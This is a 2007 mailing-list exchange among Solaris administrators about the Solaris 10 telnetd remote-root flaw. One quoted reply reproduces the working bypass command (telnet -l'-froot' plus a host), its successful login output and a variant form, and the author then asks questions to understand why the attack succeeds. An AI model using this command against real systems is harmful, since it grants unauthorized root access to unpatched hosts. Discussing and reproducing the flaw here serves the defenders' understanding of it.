[geeks] Solaris 10 Remote-Root Exploit
lionel4287 at verizon.net
Mon Feb 12 12:08:46 CST 2007
>From: Doug McLaren <dougmc at frenzied.us>
>Date: 2007/02/12 Mon AM 11:43:48 CST
>To: The Geeks List <geeks at sunhelp.org>
>Subject: Re: [geeks] Solaris 10 Remote-Root Exploit
>On Mon, Feb 12, 2007 at 11:21:13AM -0600, Lionel Peterson wrote:
>| Just a few datapoints - anyone recreate this yet?
GREAT - thanks.
Now, a few questions:
1) Were you logged in as "root" or "non-superuser user"?
2) What is the OS of the Telnet client you are using (Linux, Solaris, etc.)?
3) Is there any logical connection between the two machines (as I understand it "-f" sends credentials to telnetd, I want to make sure there is no connection between the two)?
I am curious if you have two machines with identical root passwords when this is successful...
Thanks for the datapoints - I really do appreciate it.
>% telnet -l"-froot" sunspot
>Connected to sunspot.
>Escape character is '^]'.
>Last login: Fri Feb 9 14:37:41 from lenny.vignette.
>Sun Microsystems Inc. SunOS 5.10 Generic January 2005
>It also worked on different accounts as well.
>Now, this box does allow telnets in as root (intentionally, as it's a
>sandbox type box) so maybe that's relevant. It's probably not
>anywhere near up to date on patches either.
>(It also seems to work OK when done with a `telnet -l -froot sunspot',
>for another data point.)
>Doug McLaren, dougmc at frenzied.us
>Kill -9 'em all, let root at localhost sort 'em out.